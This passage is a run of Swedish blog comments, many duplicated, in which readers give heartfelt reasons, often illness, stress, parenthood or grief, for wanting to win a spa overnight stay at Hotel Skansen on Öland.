  94. Till min mamma som kör med mig från norr till söder och visar mina rötter och odlar min kärlek till mitt kära Öland. Det har fått mig att känna stor kärlek och stolthet över att vara ölänning trots att jag numera bor i Stockholm. Jag har fått många smultronställen som nu senast urmysiga cafét i Haget. Den gemenskap och ”bykänsla” man känner har jag inte riktigt reflekterat över innan. Kanske jag en dag gör en bok om alla smultronställen på Öland ? Jag skulle vilja bjuda tillbaka till min mamma. överraska henne och vara den som istället ger henne ett smultronställe på Öland. Jag vet att hon aldrig besökt eller unnat sig någon SPA på fina Skansen.

  95. Åh vad detta låter super härligt ! När man e full med värk reumatiskt o fibromyalgie så hade detta varit underbart att få komma till o koppla av o njuta ! O när man har varit ensammstående mamma till 3 barn som i dag gett mig 2 helt fantastiska barnbarn som jag gärna försöker att ställa upp för trots min värk 🙁 Men barn lär sig snabbt vad man kan göra med dom o hur mycket man orkar trots daglig smärta <3 Hoppas så på turen <3

  96. jag har alltid velat åka på en spa upplevelse med min pojkvän, men aldrig kommit iväg… nu har vi precis flyttat o bor i en flyttkaos och har massa målare runt oss så vi far på olika håll… han är iväg och jobbar mycket så skulle vilja bjuda med han på denna fantastiska spaupplevelse så vi bara kan få koppla av och får vara tillsammans!

  97. Hej !!
    Det skulle vara sååå sköönt att få åka iväg med mannen i mitt liv <3 på en mini semester, har 6 barn mellan 12 och 11 månader så man kan säga att vi INTE får någon egen tid 🙂 …älska barnen, men man behöver även sköta mannen som man älskar och hålla lågan öppen, ej heller har vi några extra pengar till något Lyxigt som en övernattning på hotell. Ett + att få komma över till vårt fina grannland och hälsa på dig My och alla andra trevliga svenskar. <3
    Ha det bra.

  98. ett spa besök med övernattning hade varit välbehövt efter en oförvillig renovering sen i påsk! Att bo i ett renoveringskaos utan kök tar på kropp och psyke samtidigt som man ska prestera bra på jobb och i studier. Nu när allt lugnat ner sig hade det varit skönt med en spa vistelse på fina Öland ?!

  99. Jag är 26 men känner mig just nu som 86. Jag har två små barn och släppte nyss den trygga zonen (äldreomsorgen) och läser nu min första termin på högskolan. Har denna veckan suttit och tynat bort framför datorn med min första hemtenta, svettigt vill jag lova men nu är den äntligen färdig! Dessutom åket jag förbi hotell Skansen flera gånger i veckan och drömmer mig bort varje gång (har aldrig varit på spa) och mina fönster pryds av snygga växter från My’s blommor, är inte bara det en tillräckligt bra motivering? ?

  100. Älskar Öland, älskar underbara hotell Skansen! Nu är det tyvärr några år sedan jag var där och åt deras fantastiska julbord! Efter ett tufft år med sjukskrivning för utmattning, börjar jag sakta hitta tillbaka till Livet igen, så att få njuta spa hade varit underbart, speciellt på Öland, och Färjestaden, som känns som hemma!

  101. Efter att jobbat 200 timmar övertid på 5-6 månader och ändå ansvarat för 2 pojklag i fotboll vilket är minst 5 pass i veckan och snart ska vi även flytta till hus. Så jag tycker att min sambo och jag behöver koppla av tillsammans eftersom vi knappt träffas.

  102. Jag vill vinna detta för att jag trivs SÅ bra på Skansen och jag skulle vilja ta med en av mina vänner som har ställt upp för mig och hon behöver komma iväg. Då vill jag visa henne detta guldkornet på vår underbara ö!

  103. Ölandsdrömmar, kanske ett provsmak en natt, tills hemkänslan kommer, då vi kan njuta av stunden, havet och lunden. Vore toppen! 🙂

  104. Sliten mamma som jobbar jämt
    Som ensamstående blir gulkanten på tillvaron ett skämt
    Vore underbart att komma bort från vardagen ett tag
    Och rå om sig själv för en dag

  105. Kan nog egentligen inte beskriva hur mkt jag/vi behöver detta.
    Vi har haft en tuff tid, men nu är jag nyopererad och hoppas att min värk ska bli bättre och därmed humöret

  106. Saknar mitt underbara Öland
    Många mil i mellan oss men en resa ner och få skämma bort sig lite skulle vara härligt.
    Så kan jag passa på att få träffa lite vänner när jag kommer ner.

  107. Hej! Detta skulle verkligen sitta fint! Har absolut ingen vardagslyx i mitt liv känns det som. Fast i ekorrhjulet med jobb, lämning & hämtning på dagis och skola. Städa, handla, tvätta… Vill ha lite mer guldkant på min vardag, men har svårt att få till det. Tiden räcker liksom inte till… Är ny läsare av din blogg, gillar den väldigt mycket ! Tack för att du delar med dej av ditt liv 🙂

  108. Är gravid med vårt tredje barn och jag är mitt uppe i en period där jag är helt tömd på energi och ork. Har massa dåligt samvete för mina barn som jag inte orkar vara den bästa mamman till just nu. Min sambo får göra allt och lite till hemma och samtidigt stå ut med mina ”hormonsutbrott”. Vi skulle verkligen behöva en dag ifrån barnen med bara varandra där vi får samla energi och bara mysa.

  109. Ska någon få åka på ett lite lyx med massage och annat mys så vill jag att min dotter ska få åka tillsammans med mig. Hon har önskat sig massage på något fint ställe i flera år. Hon är en så fin tjej som alltid vill sina vänner väl. Drömmen att ge henne detta har alltid funnits där men pengarna har trytit.

  110. Önska över allt annat och få ta med mig envav mina döttrar. Att få stressa av och bli lite bortskämda. Efter sjukdomar och kaos i arbetslivet skulle detta vara himmelriket

  111. Jag har aldrig vunnit på nåt och kommer inte göra det nu heller så jag vill önska er andra lycka till.Eller ju jag ”vann” av 100 000 barn som födds varje år så födds ett barn med en ovanlig syndrom , där så ”hade jag tur” att få ett barn med funktionshinder men att vinna på lotto eller någon tävling nepp.:-) Jag skrev det här med glimmten i ögat .Är bara bitter över att jag aldrig vinner ?

  112. Jag har sedan 15 år tillbaka en svår whiplash skada som även utvecklat fibromyalgi, Never i kläm i vä höft, vilket leder till bortdomningar i benet, vilket jag även har i vä arm. Nu är jag heltids sjukskriven, värken är så mycket värre, gå inte att beskriva denna smärta som jag lever med varje dag dygnet runt. Vilket inte blir mycket sömn. Tappar humöret lätt, blir ledsen lätt, deprimerad. Idag har jag varit på smärtkliniken igen i Västervik, ingen rolig bilfärd dit fick stanna flera gånger då jag inte hade någon som kunde följa med. Fick tio kortison och bedövnings sprutor på mina olika smärtområden. Nya kompletterande mediciner till dem jag redan tar, vill säga många tabletter per dag vilket jag avskyr men måste. Jag skulle verkligen bli överlycklig av att få vinna detta, där ja kan bli omhändertagen, få slappna av i varmt bad och bastu, ta en varsam massage! Jag håller tummarna hårt!

  113. WOOOW!! Vilken underbart härlig vinst, den skulle jag bli superlycklig om jag fick chansen att njuta av tillsammans med en kär vän, varför ska just jag vinna den då?? ja jag är väl inte så speciell eller märkvärdig på något sätt, men jag vill fira att jag är ”på banan” igen, jag som är sjuksköterskan som själv blev sjuk, för att jag inte tog lika väl hand om mig själv som jag gjorde om mina patienter, så till slut var batterierna heeeelt urladdade, och de gick inte att ladda om hur jag än försökte, till slut sade jag upp mig från mitt arbete som jag arbetat med i nästan 25 år och började att träna både mentalt och fysiskt med Power Walks på en mil om dagen, 13 kilos övervikt bort och lugnet och glädjen in sedan var jag så pass frisk så jag kunde börja att arbeta igen men i en Delikatessbutik, här hade allt tungt ansvar och stress bytts ut mot glada hungriga kunder, ja det var ju lite lättsammare, det enda som inte är positivt är ju att jag tjänar ca 6-7 tusen kronor mindre i månaden, men vad gör det??? när glädjen och hälsan är tillbaka???? så jag vill fira min återkomst till livet som så sakta höll på att rinna i från mig , med en härlig spa weekend på underbara Öland 🙂
    Jag har gillat deras fb sida under mitt namn Christina Frisberg.
    Jag har delat tävlingsinlägget offentligt under samma namn.
    Jag sänder över kramar till alla som vill, törs och behöver. 🙂

  114. Skulle så gärna bara vilja ta en paus från min vardag. Består va sjukhus hela tiden känns det som. Bara få komma bort och skämma bort mej själv lite, mamma skulle ju klart få följa med, min klippa i allt. Hade varit helt underbart . . . .

  115. Åh vilken generös tävling, är sönderstressad pga flytt o jättesjuk svärfar som pendlat mellan liv o död, vakat på sjukhuset hela sommaren – tappar hår o är bara allmänt körd i botten…
    Har ALDRIG nånsinn gjort nån spa behandling så det vore lyx, lyx för mig..
    Gillar sidorna o delat inlägget…

    Hoppfull kram fr mig

  116. Jag är gravid V 32. Har haft magsjuka, veckan efter det blev jag jag förkyld och sen blev jag förkyld igen efter 1, 5 vecka. Sen augusti har jag haft kraft sammandragningar och mycket foglossning, så har varit jobbigt allt detta.

  117. Till min mamma som kör med mig från norr till söder och visar mina rötter och odlar min kärlek till mitt kära Öland. Det har fått mig att känna stor kärlek och stolthet över att vara ölänning trots att jag numera bor i Stockholm. Jag har fått många smultronställen som nu senast urmysiga cafét i Haget. Den gemenskap och ”bykänsla” man känner har jag inte riktigt reflekterat över innan. Kanske jag en dag gör en bok om alla smultronställen på Öland 🙂 Jag skulle vilja bjuda tillbaka till min mamma. överraska henne och vara den som istället ger henne ett smultronställe på Öland. Jag vet att hon aldrig besökt eller unnat sig någon SPA på fina Skansen.

  118. jag har alltid velat åka på en spa upplevelse med min pojkvän, men aldrig kommit iväg… nu har vi precis flyttat o bor i en flyttkaos och har massa målare runt oss så vi far på olika håll… han är iväg och jobbar mycket så skulle vilja bjuda med han på denna fantastiska spaupplevelse så vi bara kan få koppla av och får vara tillsammans!

  119. ett spa besök med övernattning hade varit välbehövt efter en oförvillig renovering sen i påsk! Att bo i ett renoveringskaos utan kök tar på kropp och psyke samtidigt som man ska prestera bra på jobb och i studier. Nu när allt lugnat ner sig hade det varit skönt med en spa vistelse på fina Öland :)!

  120. Jag är 26 men känner mig just nu som 86. Jag har två små barn och släppte nyss den trygga zonen (äldreomsorgen) och läser nu min första termin på högskolan. Har denna veckan suttit och tynat bort framför datorn med min första hemtenta, svettigt vill jag lova men nu är den äntligen färdig! Dessutom åket jag förbi hotell Skansen flera gånger i veckan och drömmer mig bort varje gång (har aldrig varit på spa) och mina fönster pryds av snygga växter från My’s blommor, är inte bara det en tillräckligt bra motivering? 😉

  121. Jag skulle jättegärna vilja vinna detta otroliga paket för att kunna få unna mig lite vardagslyx. Som student finns det inte mycket pengar över till sådant, tyvärr. Skulle jag vinna så skulle jag bjuda med min sambo, så att vi tillsammans kan få njuta och koppla av efter ett turbulent år med flytt till ny stad, ny utbildning och nytt jobb ?

  122. Älskar Öland, älskar underbara hotell Skansen! Nu är det tyvärr några år sedan jag var där och åt deras fantastiska julbord! Efter ett tufft år med sjukskrivning för utmattning, börjar jag sakta hitta tillbaka till Livet igen, så att få njuta spa hade varit underbart, speciellt på Öland, och Färjestaden, som känns som hemma!

  123. Önska över allt annat och få ta med mig envav mina döttrar. Att få stressa av och bli lite bortskämda. Efter sjukdomar och kaos i arbetslivet skulle detta vara himmelriket

  124. Jag har aldrig vunnit på nåt och kommer inte göra det nu heller så jag vill önska er andra lycka till.Eller ju jag ”vann” av 100 000 barn som födds varje år så födds ett barn med en ovanlig syndrom , där så ”hade jag tur” att få ett barn med funktionshinder men att vinna på lotto eller någon tävling nepp.:-) Jag skrev det här med glimmten i ögat .Är bara bitter över att jag aldrig vinner 😀

  125. Skulle så gärna bara vilja ta en paus från min vardag. Består va sjukhus hela tiden känns det som. Bara få komma bort och skämma bort mej själv lite, mamma skulle ju klart få följa med, min klippa i allt. Hade varit helt underbart . . . .

  126. Jag skulle jättegärna vilja vinna detta otroliga paket för att kunna få unna mig lite vardagslyx. Som student finns det inte mycket pengar över till sådant, tyvärr. Skulle jag vinna så skulle jag bjuda med min sambo, så att vi tillsammans kan få njuta och koppla av efter ett turbulent år med flytt till ny stad, ny utbildning och nytt jobb 🙂

  127. Trött nybliven 30 årig två barns mor. längtar tillbaka till öland, solen , vindarnas och vattnets lilla kobbe. Skulle vara helt underbart att få vinna och desutom mjuka upp en trött kropp

  128. Denna sommar ha ej inneburit en ledig stund då vi stått med 2 hus och har 3 barn. De ena ar flytta in i och de andra att sälja. Skulle vara underbart att få njuta hos er.
    Med mig skulle jag ta en vän som mist sin dotter och gått igenom en slitsam separation där hon behöver få lite omsorg på bästa sätt!

  129. Trött nybliven 30 årig två barns mor. längtar tillbaka till öland, solen , vindarnas och vattnets lilla kobbe. Skulle vara helt underbart att få vinna och desutom mjuka upp en trött kropp

  130. Denna sommar ha ej inneburit en ledig stund då vi stått med 2 hus och har 3 barn. De ena ar flytta in i och de andra att sälja. Skulle vara underbart att få njuta hos er.
    Med mig skulle jag ta en vän som mist sin dotter och gått igenom en slitsam separation där hon behöver få lite omsorg på bästa sätt!

  131. Först och främst så skulle jag vilja tacka för en jätte bra blogg ? jag skulle jätte gärna vilja vinna en liten spa upplevelse.. En stressig små barns förälder som jobbar heltid och pluggar. Så just nu känner jag mig super stressad. Skulle vara alldeles utmärkt att vinna detta underbara pris ? och då kan vi samtidigt åka och hälsa på min mans släkt i Kalmar som vi aldrig kommer till skott med. Ha det super bra ?

  132. Ja vardagslyx tillhör inte min vardag så det vore lycka att få en SPA-dag! Sambon får följa med också och kunde jag skulle katterna också få följa med. ?

  133. Först och främst så skulle jag vilja tacka för en jätte bra blogg 🙂 jag skulle jätte gärna vilja vinna en liten spa upplevelse.. En stressig små barns förälder som jobbar heltid och pluggar. Så just nu känner jag mig super stressad. Skulle vara alldeles utmärkt att vinna detta underbara pris 🙂 och då kan vi samtidigt åka och hälsa på min mans släkt i Kalmar som vi aldrig kommer till skott med. Ha det super bra 🙂

  134. Hej kära My ?
    Älskar också skansen och skulle gärna vilja ta med min pojk, Neo på 8 år. Han har ADHD vilket gör att han behöver avkoppling med lugn och ro. Han älskar massage och blir lugn av det. Egentid med mamma, det är grejer det ?

  135. Ja vardagslyx tillhör inte min vardag så det vore lycka att få en SPA-dag! Sambon får följa med också och kunde jag skulle katterna också få följa med. 🙂

  136. Hej My! Det skulle vara helt fantastiskt att få fira sin andra bröllopsdag på Skansen Öland! ❤️ Håller tummat och tår!

  137. Hej kära My 🙂
    Älskar också skansen och skulle gärna vilja ta med min pojk, Neo på 8 år. Han har ADHD vilket gör att han behöver avkoppling med lugn och ro. Han älskar massage och blir lugn av det. Egentid med mamma, det är grejer det 🙂

  138. En dag eller två på spa med min sambo är precis vad vi skulle behöva., jag gör allt för mitt barn, och har så svårt att bryta mig loss då han har en kronisk leversjukdom och ofta krampar. Det har istället gjort att jag inte sovit utan honom, en ända natt sedan han föddes för två år sedan. Jag och min sambo har rent psykiskt inte orkat lämna ifrån oss honom, en sekund. Vilket såklart har drabbat vår relation. Vi älskar varandra över allt, men skulle vilja hitta tillbaka till varandra.. Utöver allt oroande. Att få vinna hade betytt så mycket mer än bara några fantastiska dagar. Set hade antagligen räddat vår familj. Och knuffat oss ett steg framåt, i rätt riktning. Tack för chansen, gillat och delat!

  139. Delat blogginlägget och gillat sidan ?
    Jag vill vinna denna underbara tripp till mig å min fantastiska sambo.
    Han gör allt för mig och jag vill gärna kunna vista min tacksamhet och kärlek till honom genom en spa tripp. Jag kan dock inte fixa det själv men genom denna tävlig kan en dröm gå i uppfyllelse ♥♥♥
    Håller tummar å tår!

  140. Som stressad småbarnsförälder skulle det vara helt underbart att få komma bort och njuta lite ? och sen så älskar jag Öland, finns inget som är så fint (*) ha det gott

  141. Skulle vilja åka med min dotter . Att bara umgås och mysa på spa bara mor o dotter. Det kallas LIVSKVALITE. ps: mamma är mamma fast man är 22år och vuxen.

  142. En dag eller två på spa med min sambo är precis vad vi skulle behöva., jag gör allt för mitt barn, och har så svårt att bryta mig loss då han har en kronisk leversjukdom och ofta krampar. Det har istället gjort att jag inte sovit utan honom, en ända natt sedan han föddes för två år sedan. Jag och min sambo har rent psykiskt inte orkat lämna ifrån oss honom, en sekund. Vilket såklart har drabbat vår relation. Vi älskar varandra över allt, men skulle vilja hitta tillbaka till varandra.. Utöver allt oroande. Att få vinna hade betytt så mycket mer än bara några fantastiska dagar. Set hade antagligen räddat vår familj. Och knuffat oss ett steg framåt, i rätt riktning. Tack för chansen, gillat och delat!

  143. Min stora förebild (mormor, 78) i livet blev tyvärr ensam i början på sommaren då morfar till slut fick somna in och bli fri från smärtan. Mormor finns alltid där som ett stöd för vem än som vill och behöver. Hon har aldrig kunnat resa eller göra något för sin egen skull då hon tagit hand om morfar som varit sjuk sedan 20 år tillbaka. Det vore drömmen för mig att få bjuda henne på en riktig SPA-upplevelse, samtidigt en chans för oss att bara få prata gamla minnen och upplevelser.

  144. Delat blogginlägget och gillat sidan 🙂

    Jag vill vinna denna underbara tripp till mig å min fantastiska sambo.
    Han gör allt för mig och jag vill gärna kunna vista min tacksamhet och kärlek till honom genom en spa tripp. Jag kan dock inte fixa det själv men genom denna tävlig kan en dröm gå i uppfyllelse ♥♥♥
    Håller tummar å tår!

  145. Småbarnsmamma och ensam, det säger väl det mesta för er som har barn. Därför skulle jag behöva lite omvårdnad! ?

  146. Som stressad småbarnsförälder skulle det vara helt underbart att få komma bort och njuta lite 🙂 och sen så älskar jag Öland, finns inget som är så fint (*) ha det gott

  147. Skulle vilja åka med min dotter . Att bara umgås och mysa på spa bara mor o dotter. Det kallas LIVSKVALITE. ps: mamma är mamma fast man är 22år och vuxen.

  148. Min stora förebild (mormor, 78) i livet blev tyvärr ensam i början på sommaren då morfar till slut fick somna in och bli fri från smärtan. Mormor finns alltid där som ett stöd för vem än som vill och behöver. Hon har aldrig kunnat resa eller göra något för sin egen skull då hon tagit hand om morfar som varit sjuk sedan 20 år tillbaka. Det vore drömmen för mig att få bjuda henne på en riktig SPA-upplevelse, samtidigt en chans för oss att bara få prata gamla minnen och upplevelser.

  149. Småbarnsmamma och ensam, det säger väl det mesta för er som har barn. Därför skulle jag behöva lite omvårdnad! 🙂

  150. Efter en helt år av packande och uppackande av saker för att fritids/skolan jag jobbar på skulle flytta, är jag helt slut och sönderstressad eftersom jag och en till fått göra allt. Pga av att dem andra fem som jobbar på fritids inte pallat och blivit sjukskrivna. Tyvärr är visa fortfarande sjukskrivna

  151. Åh det hade varit härligt att vinna denna härliga tripp. Som 3 barnsföräldrar kommer man inte iväg på tu man hand så ofta.

  152. Åh har äntligen träffat mannen i mitt liv efter tio år som singel, har varit på spa en gång i hela mitt liv och skulle så gärna vilja ta med Mr S på spa och bara vara och njuta av varandra, vi får pussla för att få ihop tid då vi båda har kids och jobbar i skift så detta skulle vara underbart
    Håller mina tummar och tår

  153. Efter en helt år av packande och uppackande av saker för att fritids/skolan jag jobbar på skulle flytta, är jag helt slut och sönderstressad eftersom jag och en till fått göra allt. Pga av att dem andra fem som jobbar på fritids inte pallat och blivit sjukskrivna. Tyvärr är visa fortfarande sjukskrivna

  154. Åh det hade varit härligt att vinna denna härliga tripp. Som 3 barnsföräldrar kommer man inte iväg på tu man hand så ofta.

  155. Åh har äntligen träffat mannen i mitt liv efter tio år som singel, har varit på spa en gång i hela mitt liv och skulle så gärna vilja ta med Mr S på spa och bara vara och njuta av varandra, vi får pussla för att få ihop tid då vi båda har kids och jobbar i skift så detta skulle vara underbart
    Håller mina tummar och tår

  156. Jag skulle verkligen vilja vinna detta. Efter mycket slit med jobb och småbarn känner jag att jag och min sambo glider ifrån varandra. Vi hinner aldrig umgås om dagarna. Det är mycket som tar upp vår tid. Och jag är rädd att vi ska växa ifrån varandra och vår lilla familj som vi har. Vi behöver verkligen lite egentid ifrån vardagen och bli påminda om var vi står hos varandra. Min största önskan, kram <3

  157. Jag skulle verkligen vilja vinna detta. Efter mycket slit med jobb och småbarn känner jag att jag och min sambo glider ifrån varandra. Vi hinner aldrig umgås om dagarna. Det är mycket som tar upp vår tid. Och jag är rädd att vi ska växa ifrån varandra och vår lilla familj som vi har. Vi behöver verkligen lite egentid ifrån vardagen och bli påminda om var vi står hos varandra. Min största önskan, kram <3

  158. Eftersom både jag och min man låg magsjuka på vår ettåriga bröllopsdag och inte har kunnat fira ordentligt skulle de vara underbart att överraska honom med denna underbara vistelse.
    Kram

  159. Eftersom både jag och min man låg magsjuka på vår ettåriga bröllopsdag och inte har kunnat fira ordentligt skulle de vara underbart att överraska honom med denna underbara vistelse.

    Kram

  160. Hej My!
    Kan inte vara lätt att välja ut en vinnare,alla vill ju åka till Skansen. Om jag vinner ska jag ta med min dotter som precis fyllt 30 år. En barnfri dag med shopping på Mys blommor, fika på Gårdby och en underbar avslutning på Skansen. Tror du hon skulle bli glad? Hon är värd lite egentid, min fina Elin, 2 barn, jobbar som sjuksköterska samt sköter bokföring åt sin mans firma. Tränar cykling och löpning i mån av tid, som sällan räcker till.
    MammaC

  161. Hej My!
    Kan inte vara lätt att välja ut en vinnare,alla vill ju åka till Skansen. Om jag vinner ska jag ta med min dotter som precis fyllt 30 år. En barnfri dag med shopping på Mys blommor, fika på Gårdby och en underbar avslutning på Skansen. Tror du hon skulle bli glad? Hon är värd lite egentid, min fina Elin, 2 barn, jobbar som sjuksköterska samt sköter bokföring åt sin mans firma. Tränar cykling och löpning i mån av tid, som sällan räcker till.
    MammaC

  162. Efter en tuff höst både privat och på jobb skulle detta vara en lyxig vinst. Skulle även tagit med min syster för att hon skulle få en underbar upplevelse tillsammans med mig. Vi är som ler och långhalm haha . Samt tänk att få komma och se din blomsteraffär live och inte bara här på bloggen.

  163. Jag skulle älska att få åka över bron och tillbringa ett dygn på detta spa som jag aldrig har besökt. Jag jobbar och sliter med ett heltidsjobb och ett extrajobb för att klara mig ekonomiskt och nu extra utgifter i form av bilreparation och tandläkarräkning, så det vore helt underbart att bara få slappna och njuta och stänga av alla tankar på alla måsten. Har ingen möjlighet ekonomiskt att unna mig detta själv……

  164. Efter en tuff höst både privat och på jobb skulle detta vara en lyxig vinst. Skulle även tagit med min syster för att hon skulle få en underbar upplevelse tillsammans med mig. Vi är som ler och långhalm haha . Samt tänk att få komma och se din blomsteraffär live och inte bara här på bloggen.

  165. Att ha två barn tär på energin ibland,
    tänk att få vila med blick över en sandig strand,
    Jag och maken önskar så en helg för oss själva,
    hoppas ni oss ska välja !

  166. Jag skulle älska att få åka över bron och tillbringa ett dygn på detta spa som jag aldrig har besökt. Jag jobbar och sliter med ett heltidsjobb och ett extrajobb för att klara mig ekonomiskt och nu extra utgifter i form av bilreparation och tandläkarräkning, så det vore helt underbart att bara få slappna och njuta och stänga av alla tankar på alla måsten. Har ingen möjlighet ekonomiskt att unna mig detta själv……

  167. Att ha två barn tär på energin ibland,
    tänk att få vila med blick över en sandig strand,
    Jag och maken önskar så en helg för oss själva,
    hoppas ni oss ska välja !

  168. Jag skulle så gärna vilja bjuda min underbara sambo på spa. Han är världens finaste kille som stöttat, hjälpt & älskat mig villkorslöst under ett tufft år. Kan inte tänka mig en bättre present att ge till min stora kärlek & min bästa vän. Gillar verkligen att följa dig My! En så härlig inställning du har. Hoppas att vi får chansen till vinst i denna helt otroliga tävling! Ha en fin söndag kväll! Stor kram J

  169. Jag skulle så gärna vilja bjuda min underbara sambo på spa. Han är världens finaste kille som stöttat, hjälpt & älskat mig villkorslöst under ett tufft år. Kan inte tänka mig en bättre present att ge till min stora kärlek & min bästa vän. Gillar verkligen att följa dig My! En så härlig inställning du har. Hoppas att vi får chansen till vinst i denna helt otroliga tävling! Ha en fin söndag kväll! Stor kram J

  170. Tänk en härlig höstdag på öland med min fina syster. Den skulle innehålla många skratt, samtal och härliga stunder. Vi skulle oxå hinna med att titta till din butik. Hem skulle våra familjer få två mammor med mycket energi !

  171. Tänk en härlig höstdag på öland med min fina syster. Den skulle innehålla många skratt, samtal och härliga stunder. Vi skulle oxå hinna med att titta till din butik. Hem skulle våra familjer få två mammor med mycket energi !

    • Varför kom inte allt med? Skrev jätte långt ju haha.
      Skulle vara underbart att vara där med min blivande man och ta det lugnt innan bröllopet. Eller efter. Du har en fin butik och trevlig personal. Vi va där inne i somras på en konsultation för mina fina bukett som vi ska beställa där! (Ja jag älskar att vara ute i god tid!)

  172. Som ensam trebarnsmamma till tre flickor är vardagen oftast lite svår att få ihop, och att unna sig något sånt här finns inte på kartan. Flickorna är 6, 8 och nio år gamla. Jag pluggar på heltid, barnen har aktiviter nästan varje dag, för det är väl klart att dom inte kan ha samma intressen så jag tycker att jag oftast spendera min lediga tid i bilen med att skjutsa barnen på sina saker. Tid för mig själv finns inte så därför så skulle jag vilja ta med min kärlek som jag tyvärr bara hinner träffa varannan helg då mina barn är hos sin pappa och hans barn hos sin mamma till vackra Gotland för en helg.

  173. Som ensam trebarnsmamma till tre flickor är vardagen oftast lite svår att få ihop, och att unna sig något sånt här finns inte på kartan. Flickorna är 6, 8 och nio år gamla. Jag pluggar på heltid, barnen har aktiviter nästan varje dag, för det är väl klart att dom inte kan ha samma intressen så jag tycker att jag oftast spendera min lediga tid i bilen med att skjutsa barnen på sina saker. Tid för mig själv finns inte så därför så skulle jag vilja ta med min kärlek som jag tyvärr bara hinner träffa varannan helg då mina barn är hos sin pappa och hans barn hos sin mamma till vackra Öland för en helg.

  174. Detta skulle vilja ta med min man på som ställer upp på mig 100 procent.
    Lider av ständig värk (reumatisk och fibromylagi). Har därför varit sjukskriven och kan inte gå tillbaka till mitt gamla jobb för att det är för hård belastning. Det har varit sjukvårdsbesök, albumlans åkningar m.m. Trotts detta så gifte vi oss förra året på sommaren. Känner att jag skulle vilja göra nått för honom då han ställer upp för mig.

  175. Egentligen vill jag inte komma med ngn snyft historia.
    År 2014 har varit ett skitår, men samtidigt ett helt fantastiskt år.
    Jag och min X make beslutade oss för att separera. Vi är bra vänner och har två fantastiska barn tillsammans.
    Men att separera är ändå väldigt smärtsamt. Speciellt då jag får vara ifrån mina älskade barn så mkt.
    Har även fått veta att min pappa, tryggheten i mitt liv, drabbats av en ovanlig cancer.
    Livet kändes piss ett tag. Men nu börjar jag komma på fötter igen.
    Att kanske få vinna denna spa upplevelse hade gjort gott för själen <3
    Kanske tillsammans med en ny kärlek?

  176. Hej My! Tack för en fin och ärlig blogg rakt ur livet!
    Jag skulle så gärna vilja vinna denna spa upplevelse för att överraska min kära man i höst mörkret! Skulle vara så uppiggande för trötta småbarnsföräldrar att få åka och rå om varandra!♡

  177. Hej!! Min msn och jag skyller verkligen behöva detta, det senaste året har frestat på hårt, med 2 dödsfall U familjen, sjukdom och andra tråkigheter. Åh att få unna oss detta ?! Kram

  178. Hej, jag skulle väldigt gärna vilja vinna det här spapaketet med övernattning! Jag och min man gifte oss för 1 år sedan i slutet av november. Skulle jag vinna så skulle jag ta med honom dit och ha en riktigt myskväll och ladda våra batterier. Båda pluggar och jobbar samtidigt så vi träffas mest när vi vaknar och precis innan vi somnar! Men fortfarande underbart att vara gift med honom! ?

  179. Jag skulle vilja vinna för att jag förtjänar det. Höstlyx är en stor önskan nu när mörkret kommer.
    Med vänlig hälsning, Sara

  180. Värdelös på motiveringar, MEN, tröttkörda utslita småbarnsföräldrar som behöver lugn och ro tillsammans! Det vore helt fantastiskt att kunna åka iväg och koppla av bara vi 2! Och som du skrev om man inte deltar kan man heller inte vinna!

  181. Jag och min sambo var haft ett tufft halv år bakom oss. Då han vart sjuk rejält på sin semester och låg inne en sväng på sjukhuset. Sedan har hösten inneburit massor med jobb för oss båda samt två små troll hemma. Så detta vore toppen för oss att vinna så vi kan få en stund för oss själva och hitta tillbaka till varandra!

  182. Efter ett riktigt tungt år på jobbet och alldeles för lite ”ta han om dig själv tid” så hade jag älskat att få komma till Öland och pysslas om och dessutom få tid för att träffa gamla vänner som man träffar alldeles för sällan. Det hade blivit årets höjdpunkt!

  183. Skulle vilja vinna detta för att kunna ta med min mamma som behöver lite uppskattning för den otroliga mamma hon är. Hon sätter alltid oss barn först och det gör att hon oftast glömmer av sig själv. Under en tid har hon glömt av sig själv alldeles för ofta och det medför dålig sömn etc. Om jag skulle vinna detta kan jag på ett sätt kunna visa min otroliga uppskattning till den underbart fantastiska mamma hon är. Det räcker oftast med en blomma eller choklad men det känns inte som det är tillräckligt, vill ge något speciellt som får henne att slappna av en stund.
    Håller nu tummar och tår!
    Vill även passa på att hälsa till alla mammor där ute i världen, NI ÄR HELT FANTASTISKA!! <3

  184. Efter 6 år tillsammans med min man,knakar det lite i knutarna!
    Sen vårat första barn kom,för snart 5 år sedan,har vi inte haft en enda dag/kväll/natt tillsammans själva!
    Det skulle vara underbart att vinna detta,så bara vi två fick göra något tillsammans och bara vara vi för en stund,och kanske hitta tillbaka till ”oss” igen!

  185. Efter sju underbara barn så ser man att….Hjälp jag behöver på SPA! ….Zibbabbannone…..Ro hit vinsten så jag blir snäll… . ; )..
    Eller måste jag tala om att November är som gjord för att jag ska vinna typ ett paket som det här. Och och och……
    näää ääääh..Det är ju Baloo björnän..
    Ja ni förstår..Släng in mig i bubblet va?

  186. I mitt jobb som sjuksköterska möter jag dagligen folk som är svårt sjuka och försöker ta hand om dem och deras familj o anhöriga. Jag åker ofta hem från jobbet och känner sån stor tacksamhet för det jag har och för min fina familj. Det jag ofta glömmer bort eller prioriterar ned är mitt och min mans förhållande vilket borde vara det viktigaste för att kunna känna sig lycklig och ge våra barn en fin uppväxt. Jag skulle bli överlycklig om jag fick åka iväg med mannen jag älskar över allt annat . Skulle ta vara på varje sekund vi hade tillsammans. Tack för en underbar blogg. Kramar från annica

  187. Ja herregud vad skönt det skulle vara att få komma iväg med min man! Vi har styrt med flytt, renovering av nya bostaden och massa vabb. Sonen började förskolan i Augusti och åkt på allt känns det som. Förkylning, magsjuka, feber och lunginflammation på bara 2månader. Vi skulle berkligen behöva denna vistelse! Få sova ut och bara vara vi två utan snor , kräks och sparkande varma barn i sängen.

  188. En sliten heltidsarbetande 3 – barnmamma och fru skulle mer än något annat behöva lite vardagslyx ihop med min kärlek. Vi firar snart 2 – åriga brölloppsdag och har insett att vi inte har ekonomi till att fira det. Känns otroligt trist så nu hoppas jag på tur. Ett extra plus i kanten är att jag då skulle få möjligheten att kunna besöka din mysiga butik.

    • Varför kom inte allt med? Skrev jätte långt ju haha.
      Skulle vara underbart att vara där med min blivande man och ta det lugnt innan bröllopet. Eller efter. Du har en fin butik och trevlig personal. Vi va där inne i somras på en konsultation för mina fina bukett som vi ska beställa där! (Ja jag älskar att vara ute i god tid!)

